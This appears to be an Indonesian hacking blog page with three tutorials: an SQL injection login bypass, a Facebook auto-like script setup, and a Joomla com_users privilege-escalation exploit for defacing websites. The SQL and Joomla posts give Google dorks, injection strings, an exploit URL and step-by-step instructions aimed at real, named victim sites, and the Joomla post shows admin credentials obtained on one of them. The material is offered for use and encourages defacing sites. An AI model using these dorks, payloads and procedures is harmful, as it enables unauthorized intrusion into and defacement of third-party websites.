Jumat, 07 Februari 2014

Tutorial Bypass SQL Login

Assalamuallaikum sobat IDCA :)
Berhubung tadi pada minta tutorial deface, ya sudaaah saya kabulin dah. Pada artikel ini saya akan membahas mengenai "Bypass SQL Login" maksudnya gimana tuh?

Maksudnya.. dengan memanfaatkan eror pada sql website tersebut kita dapat login ke administrator web tersebut tanpa harus memasukan username dan password yang sudah dibuat admin. Singkatnya sih "bypass = bye bye password"

Oke langsung  saja kita masuk ke tutorialnya :

[#] Dork

inurl:manager intitle:Admin Panel
inurl:/admin2/ ext:php
inurk:/admin/ ext:php
inurl:/adminpanel/ ext:php
inurl:/admin_panel/
[#] Langkah-langkah

1. Masukan salah satu dork diatas ke google, lalu pilih salah satu buat demo silahkan coba web ini

http://preprojects.com/hostfriendz/int/index.php
2. Jika sudah memilih target silahkan anda coba login dengan user pass ini :
user : ' or 1=1 limit 1 -- -+ pass : ' or 1=1 limit 1 -- -+

 

Nah jika berhasil ya sudah deh terserah mau kalian apakan :D
Simpel ya hhee dah cukup itu aja kok :D

Sekian tutorial dari saya thanks to Xcode ^_^

untuk kedepannya jika saya sudah dapat banyak refrensi, artikel ini akan saya perbarui dengan menambah macam erornya dan kenapa bisa masuk
Read More
Diposting oleh Unknown di 07.27 0 komentar

Cara Membuat Auto Like Facebook Work 100%

Assalamualaikum..

Jumpa lagi yaa,, udah lama saya ga posting thread baru disini.. harap dimaklumi, sekarang udah rada sibuk.. hehhe oke sekarang saya akan sedikit memberikan tutorial cara agar akun facebook sobat ngelike secara otomatis (auto like).

Persiapkan terlebih dahulu:

1. Script code | Download
2. Kode Akses Token | Lihat Disini


Oke kalo semua sudah siap, lanjut ke langkah2nya.. "Mohon sedikit meyisihkan waktunya untuk memberikan donasi, dengan cara mengklik 1x iklan yg berlabel Donasi.. Terimakasih "

Pertama buka link http://drive.google.com


Kemudian klik "Buat" lalu pilih "Script"! kalo belum ada, silahkan baca disini.


Lalu Pastekan script tadi, jangan lupa ganti "Nama Facebook" dengan nama facebook sobat dan "Kode Akses Token" dengan kode token milik sobat. lalu klik Save!


Selanjutnya akan muncul jendela popup untuk pemberian nama file, lalu klik Ok!


Setelah itu kita setting Cronjobnya, klik icon cronjob lalu akan muncul popup, dan klik tulisan "Click here to add new one".


Trus atur sesuai seperti gambar yah... setelah itu Save!


Ntar bakal muncul popup lagi, klik aja Continue > klik Terima!


Nah, selanjutnya tinggal pilih "mode on" trus klik Run!



Terakhir tinggal sek kalo auto likenya bekerja atau tidak,, silahkan buka profile facebook sobat, lalu klik "Log Aktivitas"..

Nah, segitu aja yah... mudah2an bermanfaat buat yg membutuhkan...  :D
Read More
Diposting oleh Unknown di 07.26 0 komentar

Cara Deface Dengan Teknik Exploit Joomla | Com_User

Assalamualaikum....

ehm,, jumpa lagi nih dengan coretan2 semerawut ane tapi ngangenin untuk dibaca,, wkkwkwk yo dah, dah pasti pada ga sabar kan udah nunggu dari kemaren?? wkwkwk langsung daaahh :p


Silahkan tutorial ini di baca dulu baik2, dipahami dan dipelajari, baru dah sobat praktekin :p kalo seandainya gagal, itu karena website udah di patch :p

"Talk Less Do More!" :p

oke dah simak nih! sebelumnya download dulu bahan2nya :p

1. Download : Exploit Joomla.html    Password: Lihat

2. Titip Nama : Indonesian Cyber Army 

UPDATE:

Ciri2 web yg vuln com_user, silahkan sobat check dulu login adminnya, jika seperti gambar dibawah, berarti web tersebut memungkinkan untuk bisa di exploitasi, selain itu tidak bisa...

Contoh :
http://troytradingint.com.pe/administrator/

bira lebih memudahkan sobat dalam mencari web target, silahkan gunakan Tool Scanner Com User 

Demo:
http://troytradingint.com.pe/
http://www.uog.edu.pk/
http://www.trexperts.com/jeffreytmiller/

Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Langkah Langkah::

1. Cari web target di Google.com dengan memasukkan Dork berikut:

intext:Joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com

#Dork Lain:
inurl:index.php/­using-joomla/­extensions/plugins
inurl:index.php/­using/joomla 
inurl:index.php/­using-joomla/­extensions/­components/­content-component/­article-category-list­/50-upgraders
inurl:index.php/­using-joomla/­extensions/­components/­content-component/­article-categories/­28-park-site/­photo-gallery
inurl:index.php/­using-joomla/­parameters/­26-sample-data-articl­es/park-
Inurl:index.php/­plugins 
Inurl:index.php/­rss=feed 
inurl:index.php/­joomla/content/­category-blog/­24-joomla 
inurl:index.php/­using-joomla/­extensions/­components/­content-component/­article-categories/­84-gd-articles 
inurl:Home Page Beez joomla 1.6 index.php using-joomla
inurl:index.php joomla! 1.7 - open source content management 
inurl:index.php/­using-joomla/­extension/components/­content-component/­article-category-list­/50-upgraders intext:joomla! 1.7 - open source content management
inurl:index.php/­19-sample-data-articl­es/joomla/­50-upgraders site:id inurl:index.php/­using-joomla/­extensions/templates/­beez-2/­home-page-beez-2 
inurl:index.php/­19-sample-data-articl­es/joomla
inurl:Home Page Beez5 joomla 1.6 index.php/­using-joomla/­extensions/­components/­users-component/­registration-form

2. Pilih target sobat, lalu masukin exploit berikut:

index.php?option=com_users&view=registration

3. Ane disini mengambil contoh:

http://mobile.resto-lincontournable.com/index.php/utiliser-joomla/utiliser-extensions/composants/composant-flux-rss/un-flux-rss

4. kemudian ane ganti menjadi:

http://mobile.resto-lincontournable.com/index.php?option=com_users&view=registration


5. Setelah itu klik kanan>klik View Page Source atau bisa juga tekan tombol keyboard CTRL+U

kalo sudah muncul page sourcenya, lalu tekan tombol CTRL+F atau klik menu Find ketik hidden. cari seperti kode berikut:


6. Copy kode tersebut, lalu buka Exploit Joomla.html yang udah sobat download tadi dengan Notepad, lalu pastekan kode tersebut, dan masukkan juga site target dan Email sobat! liat gambar !

Note: username, email, boleh diganti sesuka hati.
7. Lalu Save! Setelah itu buka file Exploit Joomla.html nya, Klik Register!

8. Setelah itu akan muncul peringatan bahwa password harus diisi sama! Masukkan password sobat!


9. Setelah password diisi, klik Register! lalu buka email sobat dan klik link Konfirmasinya!







10. Lalu masuk kehalaman admin login nya! 

http://mobile.resto-lincontournable.com/administrator

11. Masukkan Username & Passwordnya! lalu klik Login! kalo contoh disini:

Username:genesis
Password:onix

Tararaaaaaaaaaaaaaa!! Sobat masuk sebagai admin! trus tebas deh index nya :p Liat Cara Tebas Index

KALO GA BERHASIL LOGIN SEBAGAI ADMIN, SILAHKAN CARI TARGET LAINNYA!!

Goodluck!!! :p

udah gitu aja! Salam........ :p
Read More
Diposting oleh Unknown di 07.22 0 komentar
Langganan: Postingan (Atom)
 
Inside Hacker © 2011 Templates | uzanc